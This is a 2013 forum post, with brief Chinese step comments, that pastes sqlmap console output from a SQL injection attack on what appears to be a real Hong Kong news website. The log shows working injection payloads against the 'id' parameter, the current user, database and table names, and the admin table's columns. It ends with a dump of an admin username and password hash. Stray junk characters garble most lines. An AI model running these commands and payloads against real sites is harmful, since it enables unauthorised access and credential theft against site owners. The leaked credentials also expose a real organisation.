D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db. k" d7 D! M* B( D7 U: P
ms "Mysql" --current-user /* 注解:获取当前用户名称
9 H. P4 |/ W$ p9 Z9 q4 A sqlmap/0.9 - automatic SQL injection and database takeover tool. O6 \$ d6 y" p: i" K
http://sqlmap.sourceforge.net starting at: 16:53:54
3 e, x8 ]5 I; L$ W# m6 p[16:53:54] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as' B, q& ~: @4 a+ @& z
session file; s9 e0 c9 f& |8 I: B i; s
[16:53:54] [INFO] resuming injection data from session file% t+ G( M0 Z8 O8 u$ I, b9 F
[16:53:54] [INFO] resuming back-end DBMS 'mysql 5.0' from session file; N5 p$ n9 {5 v* V( _2 [
[16:53:54] [INFO] testing connection to the target url
& |% N' t+ F. Msqlmap identified the following injection points with a total of 0 HTTP(s) reque" C; ~! B6 I5 A0 K- K$ d+ t
sts:
7 i& l1 ~5 l! k6 d, \---9 I8 U+ {& y( Q% ]# g( a
Place: GET
r, k) c/ p, q, \- E$ tParameter: id
1 V4 x5 n& Z$ Q' t1 G) ? Type: boolean-based blind8 a( c$ t8 k7 W
Title: AND boolean-based blind - WHERE or HAVING clause
# r6 a$ A* a ^% @! L Payload: id=276 AND 799=7997 {) N& `5 _0 W# T5 Q
Type: error-based
" q4 v4 v8 z/ r( k& r x Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
) c5 e b; X1 X" [ Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
( c R g% c$ k2 W, e" q# e' ?! N! K120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
9 j( q8 e- L1 [" ?9 |) w),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)/ R! R ^5 l, J8 R
Type: UNION query
3 m" S8 r @4 w# n) k Title: MySQL UNION query (NULL) - 1 to 10 columns
# ~/ k8 `. a" I( y Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
" o* S1 A. y) w(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),/ l' E% i8 X+ B9 t0 x# B8 t) {8 g
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#! j! X. e* D! y3 m; i9 Y# u/ h
Type: AND/OR time-based blind
* r3 {0 r& S, ^" H' p3 l |' z% { Title: MySQL > 5.0.11 AND time-based blind4 V- h0 Q Q+ V, B) j) x' L
Payload: id=276 AND SLEEP(5)
0 N* m$ c1 Z. b, H, }---* e( {& y$ H" o0 \; I4 G& N
[16:53:55] [INFO] the back-end DBMS is MySQL
8 z6 \- z6 A$ n1 Qweb server operating system: Windows
2 ?* S. A+ i0 f' i2 Nweb application technology: Apache 2.2.11, PHP 5.3.0
B7 ?8 A) s* X' |6 Bback-end DBMS: MySQL 5.0
8 u- S1 W* j- @7 m[16:53:55] [INFO] fetching current user
' l9 |) e4 s: Y4 Gcurrent user: 'root@localhost'
& S7 r2 s( y! n" W[16:53:58] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou; [% p* T/ T- O
tput\www.wepost.com.hk' shutting down at: 16:53:58. c% S. `0 |# S% A. b$ Y
" G+ Q; e; F! p; O: t. G6 v
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
" k2 F! a0 S( w3 L% sms "Mysql" --current-db /*当前数据库: W+ `: o1 ^6 `1 ?* A
sqlmap/0.9 - automatic SQL injection and database takeover tool
) u! Q5 {- O( p7 D! U5 F http://sqlmap.sourceforge.net starting at: 16:54:168 H# q- m! P3 U
[16:54:16] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as- Z0 r9 h( F- l5 k- q0 ^
session file' C3 g G: q2 V
[16:54:16] [INFO] resuming injection data from session file
+ P" Z* Y; i* s( T2 p[16:54:16] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
2 ]+ D" \+ [ X5 [. \' i[16:54:16] [INFO] testing connection to the target url
# [( v1 k7 }" a D. z9 \. r2 g( Asqlmap identified the following injection points with a total of 0 HTTP(s) reque
5 V. B- ]/ c' b: o# o. R+ D) Qsts:/ [# g; Q& T& h) Y& F3 \
---- ^( \4 r$ A7 p
Place: GET' R3 ]# [; C, P2 C4 T& f
Parameter: id
" T. d( A) X; I1 _% X$ I Type: boolean-based blind
: ?* u5 }$ x/ l* M/ _/ F Title: AND boolean-based blind - WHERE or HAVING clause2 k& l- K4 i9 h( N# n
Payload: id=276 AND 799=799$ L: V, _+ A, s# m+ o" w
Type: error-based
( n0 g( _' i$ N p) ~% _ Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
, k/ O" t9 G" O6 i/ _( P# P) { Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
! R! Q& F$ K8 w2 {* p5 G4 G9 k120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,587 R0 P% J+ k- N8 y3 D/ W
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
2 G) R1 e; z% d) p4 J1 H Type: UNION query
! X' V$ Q+ e, h" X& j* G: z Title: MySQL UNION query (NULL) - 1 to 10 columns3 W, _4 l: l4 N( P- b/ K S! w
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR6 A3 e. F" P& o, q1 F2 h% F: ?
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
% O* j( ]8 b C2 o3 D0 RCHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#- J- j3 V* y7 l% }% J7 F
Type: AND/OR time-based blind) }- f2 g' H! I, y4 b! t& \; ?
Title: MySQL > 5.0.11 AND time-based blind
* s2 i9 a4 D+ s6 c+ A4 @8 X" w Payload: id=276 AND SLEEP(5)
' c$ M7 E9 Q& d2 V$ Q+ `/ G8 a---7 U( e( |% @. O3 {& s$ h x
[16:54:17] [INFO] the back-end DBMS is MySQL4 d/ C2 p- y: m" ^
web server operating system: Windows
% T3 r! j, M9 rweb application technology: Apache 2.2.11, PHP 5.3.08 A [% A1 F8 M- d
back-end DBMS: MySQL 5.0
0 k( t3 h9 Y8 O6 `5 h( r' L0 O[16:54:17] [INFO] fetching current database
: p* B% V6 R' o' c* scurrent database: 'wepost'* D8 U1 Z+ v* `# j* g4 C8 O
[16:54:18] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou
& e! F0 q1 q4 K4 Z" A. e' htput\www.wepost.com.hk' shutting down at: 16:54:18
4 l+ [. X& @0 m* O/ j: `" ]. yD:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
+ w) L$ K/ B1 F. _* o6 ]' U" B9 qms "Mysql" --tables -D "wepost" /*获取当前数据库的表名. ~: z' o, O0 K ]5 W
sqlmap/0.9 - automatic SQL injection and database takeover tool
% `' A4 B2 e7 S1 a- J http://sqlmap.sourceforge.net starting at: 16:55:25
T2 l- P' u% W) P[16:55:25] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as
" U' p7 d, g9 q session file: w! ?% E$ I4 t% j, L
[16:55:25] [INFO] resuming injection data from session file
! m& g" }- H/ U0 `" b: ] @[16:55:25] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
5 K- v7 W. s8 \! A3 ~[16:55:25] [INFO] testing connection to the target url8 C8 _0 g, B5 F5 H3 {' U9 Z
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
. S4 K# w0 f! u2 T: Gsts:
* A" ~/ G. _7 Z/ g5 X0 U+ l0 e---
0 T; r7 p9 A$ Q5 wPlace: GET9 r% V+ C6 [, Q3 Z3 P! W
Parameter: id7 `( k5 j! ]; Y# ]1 [% I9 l7 Z5 O! P
Type: boolean-based blind9 v5 c7 z4 G: z$ ]6 J4 j- P0 H
Title: AND boolean-based blind - WHERE or HAVING clause
* a( w2 T' v' R2 q& j Payload: id=276 AND 799=799
$ f ?* m9 A4 y* l; h+ A* n Type: error-based
5 B% O, O# M1 l- W Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause9 @7 @, Q; o2 { T, |& o1 d
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,) _# r% z! ]1 r7 ^- _
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58; j) T( X- w! w1 j/ O8 k
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
% g9 N( ?: U" p, j- V5 | Type: UNION query
* g C' C- v2 d6 ]) Y: Y% p Title: MySQL UNION query (NULL) - 1 to 10 columns" t9 [8 U" N; ~# Q
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR: m U5 v! _6 A' x
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
& G) h) ~% q; w) U, CCHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#: i, [+ N1 |, K3 L
Type: AND/OR time-based blind
( c/ a* c, @+ M- u4 ]: o Title: MySQL > 5.0.11 AND time-based blind
2 ?3 }& V# s: Q9 E/ C. N& N7 ` Payload: id=276 AND SLEEP(5)
+ X/ ?- F @: C0 ], p2 g o! H k---
) h5 w8 o9 ^% d* U[16:55:26] [INFO] the back-end DBMS is MySQL
5 O3 m0 U+ [5 z9 E# pweb server operating system: Windows
; o( n( R7 |" Aweb application technology: Apache 2.2.11, PHP 5.3.0
2 _5 w3 ~& O+ A5 N7 n m ]2 mback-end DBMS: MySQL 5.0
# p4 z3 _+ L- s' W M9 U+ }8 B$ q[16:55:26] [INFO] fetching tables for database 'wepost'
7 i8 B, }( ?+ V; @$ U' h[16:55:27] [INFO] the SQL query used returns 6 entries' R3 H7 i) s* l
Database: wepost2 k6 V! l2 t& m# e1 t' x1 L- f
[6 tables]; y, }% X% P/ G
+-------------+# g; k% M1 q1 \
| admin |
/ U* B9 }1 g: k: Y$ Y| article |3 c7 f& U: [1 E6 D- g [2 v* C- V& j
| contributor |4 A. A- G6 I8 i( \; p; R; G
| idea |2 T+ o2 a7 ~9 o
| image |
7 [ g$ G# d: d| issue |
8 @( D( b8 S' @7 s+-------------+
3 A7 _0 J, f" F i" D, `. D[16:55:33] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou4 K& Y) G7 [& f* p: J w
tput\www.wepost.com.hk' shutting down at: 16:55:33
2 |- C' s( ^! M0 [
% W+ p, F5 K+ ]- [' tD:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
5 w( |# c6 G' r- [0 z6 n6 C% f4 ]ms "Mysql" --columns -T "admin" users-D "wepost" -v 0 /*获取admin表的字段名, X" k5 U" \9 s. O) S0 w) x6 H( q9 u
sqlmap/0.9 - automatic SQL injection and database takeover tool, n4 [8 K. C# u! O8 E
http://sqlmap.sourceforge.net starting at: 16:56:06
5 B% O& A, z# K3 {* `$ w' e& j- m- bsqlmap identified the following injection points with a total of 0 HTTP(s) reque
5 |# n' g, g6 V/ A' ]& A; m2 b1 xsts:
% v! J z1 Y5 z5 V' @---
: I1 M+ o8 j, {+ Y4 DPlace: GET
, s, x& n# ^, l8 Q W3 ?2 L+ SParameter: id
- y! [/ f. w7 z$ B Type: boolean-based blind6 s4 B- i' `# ~: I5 F% R% S- K
Title: AND boolean-based blind - WHERE or HAVING clause2 O4 C0 N: B% t
Payload: id=276 AND 799=799) [5 u/ y1 x' _/ g% X" \' e
Type: error-based
- ^: N5 {3 X5 s% Z3 t1 `# O1 N1 F Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
' s5 i7 C E# u Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
9 _3 F! O0 r; \8 x120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
! m5 s- h9 J' P* e" O1 D# N),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
' h% U" x# o R4 U: Y5 @; r Type: UNION query
# a8 E2 p- H6 e( u1 p2 W* }: F# w Title: MySQL UNION query (NULL) - 1 to 10 columns
1 U7 @3 T! l5 p: m8 D" L! C: l8 O) n Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR( m8 f4 Z" u- L5 W/ ~# W
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
" E6 e0 F8 _! l# k# qCHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#. U: |* M; ]9 R3 \
Type: AND/OR time-based blind: F* U7 W3 x. r, k( m
Title: MySQL > 5.0.11 AND time-based blind' r3 k, Y: m# J5 I! A
Payload: id=276 AND SLEEP(5)6 o& ~& } ]6 o9 ]
---! \% [9 u/ H9 U* u0 Q
web server operating system: Windows. k/ Y6 H# ^+ T: T
web application technology: Apache 2.2.11, PHP 5.3.0
6 _% s4 v! ~3 q: P& Q" _back-end DBMS: MySQL 5.08 Q$ O- E# d* Q
[16:56:11] [INFO] read from file 'D:\Python27\sqlmap\output\www.wepost.com.hk\se
$ G% p; o# z' tssion': wepost, wepost
* Y0 e0 @& k! x7 @: D \6 IDatabase: wepost* o+ `" }' r& T- J7 ^5 e* @/ |
Table: admin
8 |- |+ ^9 \( }1 S[4 columns]
7 ^3 B8 u4 h: m0 ?/ f$ j, X; c! \" A+----------+-------------+
2 @( j- ^1 @" s7 j6 A5 l0 [* C) {# _| Column | Type |
& T: z6 j( ~, }' {+----------+-------------+2 ~: D$ g) z+ D/ z: i
| id | int(11) |9 |" P+ z3 ], ?5 ]* |* B6 H% E2 ]
| password | varchar(32) |. j0 \3 B. r; `/ c* m+ e
| type | varchar(10) |
+ I, a( o2 h5 B) J4 f8 t" I| userid | varchar(20) |
& Z9 P" l+ ~% g, Y3 z5 \: r7 Q! m* I+----------+-------------+
- a( ]# G# N4 Z4 d" y. d2 V shutting down at: 16:56:19/ m2 U! P: g& Z. M
2 }+ i* n/ i; m* o% ` g; z3 R
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
: K0 M" ~5 {# z) o$ pms "Mysql" --dump -C "userid,password" -T "admin" -D "wepost" -v 0 /*获取字段里面的内容1 k! F: v$ V& k- W# m4 _' M3 a
sqlmap/0.9 - automatic SQL injection and database takeover tool
: ~$ v; T. n" n http://sqlmap.sourceforge.net starting at: 16:57:14! \$ k& m B! r
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
0 Q4 m$ C2 l+ G5 B! z% ksts:
0 r' g2 p y; a$ E: | j5 @0 W! o3 O---
( e O$ J5 Z3 k9 d, [1 q xPlace: GET# A; }, Y8 ~9 \6 i7 h
Parameter: id- j' w) L' ^2 K- c, H: a
Type: boolean-based blind
4 X6 \$ }+ t- E3 ?7 N: t E5 U! U Title: AND boolean-based blind - WHERE or HAVING clause
% N6 g T; x3 f; G! c- G; A4 X Payload: id=276 AND 799=799' N- o, E: k4 _; B$ ]
Type: error-based# G7 c6 M4 F. P% C0 ~$ ?
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause6 f& P5 H# T: E( Q
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,, i+ [: t8 |- `+ x! q: E0 I
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
- D, t. d# K% [" ]6 @),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)/ k3 _9 |! m- D1 l& ]7 A
Type: UNION query
# T# q) m: E2 b! N Title: MySQL UNION query (NULL) - 1 to 10 columns
- g i0 @; Q1 S9 j/ {; a9 o3 ^7 { Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
, \* X3 Q; f9 n) \* o(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),: M1 w( x4 c8 X3 m) ?( a
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
7 D: q6 s" l) ~+ V [1 ` Type: AND/OR time-based blind
9 w# k( y9 e# l* U* I( u Title: MySQL > 5.0.11 AND time-based blind' C9 R4 {$ j4 X/ W! N
Payload: id=276 AND SLEEP(5)# ^$ w9 A- {9 `: L! J
---
# @9 N$ ]2 z: d& K" ~$ ]web server operating system: Windows
0 F9 i' Z2 P2 |1 j. _9 |* Nweb application technology: Apache 2.2.11, PHP 5.3.0% E0 G( N+ _& a3 W' [- {
back-end DBMS: MySQL 5.06 [8 _! r& l( F* f; m2 i
recognized possible password hash values. do you want to use dictionary attack o
t) F3 X' z# S. In retrieved table items? [Y/n/q] y
3 l' |: x/ f" Z/ gwhat's the dictionary's location? [D:\Python27\sqlmap\txt\wordlist.txt]# R% s. p' i% H
do you want to use common password suffixes? (slow!) [y/N] y
, u2 g7 L8 @! |$ D* KDatabase: wepost) w+ y# j, f" p+ n
Table: admin
c8 X z* K& w+ Y, R, m( ^! j[1 entry]
U0 _ U8 h9 M+----------------------------------+------------+3 ?. A2 F5 X- ^& G8 f7 o
| password | userid |/ S8 W- E' O e l: o5 w
+----------------------------------+------------+
/ j/ _3 N( ]- I: V| 7d4d7589db8b28e04db0982dd0e92189 | wepost2010 |3 d8 l# T! J) [6 x) _( Z- T! y
+----------------------------------+------------+
8 n! c! P H9 h) K8 G6 X shutting down at: 16:58:14
y7 u6 Y$ W4 b q. e* L8 p+ G8 s0 o6 e, F+ f1 a( d4 Q9 c9 ` F
D:\Python27\sqlmap> |
发表于 2013-4-4 22:18:49
收藏
支持
反对